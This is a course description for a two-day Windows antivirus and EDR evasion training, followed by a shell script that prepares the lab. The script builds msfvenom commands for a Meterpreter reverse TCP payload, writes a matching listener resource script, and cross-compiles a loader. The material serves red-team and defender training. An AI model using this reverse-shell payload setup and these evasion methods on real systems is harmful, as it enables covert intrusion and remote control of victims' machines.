Training Details

Training Duration: 2 Days

This two-day hands-on training teaches the basics of how Antivirus (AV) and Endpoint Detection and Response (EDR) products work, and the modern techniques used to get around them. The training covers Windows-based AV and EDR products only. On day one, students learn how modern AVs operate and how to bypass them. Windows Defender is the focus, and by the end of day one students will be able to bypass it. Day two focuses primarily on how EDRs operate and which modern techniques can be used to evade their detection.

The training contains multiple demos and exercises so that students can practice the various concepts explained throughout the two days. By the end of the training, students will have gained enough knowledge to craft their own payloads and chain the various techniques to bypass AVs and EDRs. The training is intended for penetration testers who want to improve their red teaming capabilities, and for blue team members who want to learn which techniques adversaries might use to get around these products.

Requirements

  • Basic programming knowledge. The training focuses on C# and some C++ in Visual Studio (and on Linux). Strong C# and C++ knowledge is not required, only the basic ability to modify, update, and compile the code examples. The demos explain each step.
  • A Windows 10 Virtual Machine (VM) with Visual Studio 2022 and the following workloads installed: .NET desktop development and Universal Windows Platform development. Students need to be able to compile both C# and C++ files, so verify that a trivial C# project and a trivial C++ project build before the training starts. A ready-to-use VM (OVA format, with setup instructions for VirtualBox or VMware Player) will be available for students who need it. Students will also need network connectivity from the Windows 10 VM to their VM running Metasploit Framework (see below), since the Meterpreter payloads built during the exercises call back to that VM.
  • A VM running Metasploit Framework (Kali, for example) and basic knowledge of how to generate Meterpreter payloads and set up a Meterpreter listener. This VM also needs Python3, pip3, and mingw-w64 installed.
  • Basic knowledge of operating system internals: processes, threads, process virtual memory, kernel land vs. user land.
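The Metasploit-side preparation described in the requirements above, as an added example written for this page (a POSIX shell helper, not material from the course): it reports which of the listed tools are missing on the Metasploit VM, validates the callback address and port, builds the msfvenom command for a Windows x64 Meterpreter reverse TCP payload, writes a matching multi/handler resource script so the listener can never drift from the payload settings, and builds the mingw-w64 cross-compile command for a C loader. The payload choice, the LHOST/LPORT values, and the file names are assumptions; the course description does not specify them.

```shell
#!/bin/sh
# Metasploit VM preparation helper. Added example for this page, not course material.
# Assumptions (not stated by the course): the payload is windows/x64/meterpreter/reverse_tcp,
# LHOST/LPORT are supplied by the caller, and the Windows 10 VM can reach LHOST:LPORT.

# Tools the requirements list expects on the Metasploit VM. Prints the missing ones,
# space-separated (empty output means the VM is ready).
missing_tools() {
    missing=""
    for t in msfvenom msfconsole python3 pip3 x86_64-w64-mingw32-gcc; do
        command -v "$t" >/dev/null 2>&1 || missing="$missing $t"
    done
    printf '%s' "${missing# }"
}

# True when $1 is a dotted-quad IPv4 address. LHOST must be an address the target VM can
# reach, so catch typos before a payload is baked with the wrong callback address.
valid_ipv4() {
    case "$1" in
        ""|*[!0-9.]*|*..*|.*|*.) return 1 ;;
    esac
    addr="$1."
    n=0
    while [ -n "$addr" ]; do
        octet="${addr%%.*}"
        addr="${addr#*.}"
        [ "$octet" -le 255 ] || return 1
        n=$((n + 1))
    done
    [ "$n" -eq 4 ]
}

# True when $1 is a usable TCP port number.
valid_port() {
    case "$1" in
        ""|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Builds the msfvenom command line for a staged x64 Meterpreter reverse TCP payload.
# Formats relevant to the course: "csharp" (byte array to paste into a Visual Studio
# project) and "exe" (stand-alone executable). Prints the command, does not run it.
msfvenom_cmd() {
    lhost="$1"; lport="$2"; fmt="$3"; out="$4"
    valid_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
    valid_port "$lport" || { echo "bad LPORT: $lport" >&2; return 1; }
    printf 'msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=%s LPORT=%s -f %s -o %s' \
        "$lhost" "$lport" "$fmt" "$out"
}

# Writes a Metasploit resource script for the matching multi/handler, derived from the same
# LHOST/LPORT as the payload. Prints the path written.
handler_rc() {
    lhost="$1"; lport="$2"; path="$3"
    valid_ipv4 "$lhost" && valid_port "$lport" || return 1
    cat > "$path" <<EOF
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j
EOF
    printf '%s' "$path"
}

# Cross-compile command for a C loader on the Linux VM with mingw-w64. -static-libgcc avoids
# a runtime dependency on MinGW DLLs on the Windows 10 VM; -s strips symbols.
mingw_cmd() {
    src="$1"; out="$2"
    printf 'x86_64-w64-mingw32-gcc %s -o %s -static-libgcc -s' "$src" "$out"
}

# Usage: sh prep.sh setup <LHOST> <LPORT>   (only acts when invoked explicitly)
if [ "${1-}" = "setup" ]; then
    lhost="$2"; lport="$3"
    m="$(missing_tools)"
    [ -z "$m" ] || { echo "missing tools: $m" >&2; exit 1; }
    rc="$(handler_rc "$lhost" "$lport" handler.rc)" || exit 1
    echo "1. payload:  $(msfvenom_cmd "$lhost" "$lport" csharp payload.cs)"
    echo "2. listener: msfconsole -q -r $rc"
    echo "3. loader:   $(mingw_cmd loader.c loader.exe)"
fi
```

Run it as `sh prep.sh setup <LHOST> <LPORT>` on the Metasploit VM, then start the listener with the printed `msfconsole -q -r handler.rc` line before executing the payload on the Windows 10 VM. Keeping the handler settings in a resource file generated from the same values as the payload removes the most common cause of a "payload runs but no session arrives" failure: an LHOST or LPORT mismatch between the two sides.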